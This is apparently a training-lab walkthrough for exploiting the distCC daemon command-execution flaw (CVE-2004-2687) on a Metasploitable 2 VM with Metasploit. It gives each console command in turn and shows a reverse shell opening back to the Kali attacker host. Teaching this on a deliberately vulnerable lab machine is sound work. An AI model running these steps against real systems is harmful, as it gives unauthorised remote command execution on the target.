# distCC RCE \[CVE-2004-2687] ## distCC RCE \[CVE-2004-2687] **Note**: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing. ## Requirements | Kali Linux | The Kali Linux VM (or any other type of installation) | | ------------------------ | ----------------------------------------------------------------------------------------------------------------------- | | Metaploitable 2 | The Metasploitable 2 VM | | Metasploitable Framework | Metasploit Framework toolset (installed on Kali Linux by default) | | Metasploitable 2 IP | The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case. | | Kali Linux IP | The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case. | ## Laboratory Workflow The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations. #### 1. Launch the Metasploit Framework `msfconsole` #### 2. Search for the appropriate module `search distcc` ``` Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution ``` #### 3. Use the module `use exploit/unix/misc/distcc_exec` #### 4. Check the module options `options` ``` Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3632 yes The target port (TCP) Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.8.147 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target ``` #### 5. Set the appropriate options `set RHOSTS 192.168.8.142` ``` RHOSTS => 192.168.8.142 ``` #### 6. Show possible payloads `show payloads` ``` Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) 1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) 3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution 5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) 6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) 7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) 8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) 9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) 10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) 11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) ``` #### 7. Select the payload `set PAYLOAD payload/cmd/unix/reverse` ``` PAYLOAD => cmd/unix/reverse ``` #### 8. Show options for payload `show options` ``` Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.8.142 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 3632 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.8.147 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targe ``` #### 9. Fill the options for the payload `set LHOST 192.168.8.147` ``` LHOST => 192.168.8.147 ``` #### 10. Run the exploit `exploit` ``` [*] Started reverse TCP double handler on 192.168.8.147:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo TkKLJgAeCRqAgdiV; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "TkKLJgAeCRqAgdiV\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.8.147:4444 -> 192.168.8.142:55458) at 2023-03-28 09:42:26 -0400 ``` ## Video Video that resumes everything on this laboratory. ![](https://1253238579-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfPBLecZWemt5xh9AWf0x%2Fuploads%2Fgit-blob-2b9d4aebedad78826dc62d20c0e59bfe7205aba5%2Fdistcc.gif?alt=media) ## Questions Now that you have completed this exploitation try to answer to following: 1. Now, what can I do with the exploitation achieved? 2. Which type of privileges do I have on the exploited target? 3. How was this accomplished? 4. Try to learn more about this vulnerability.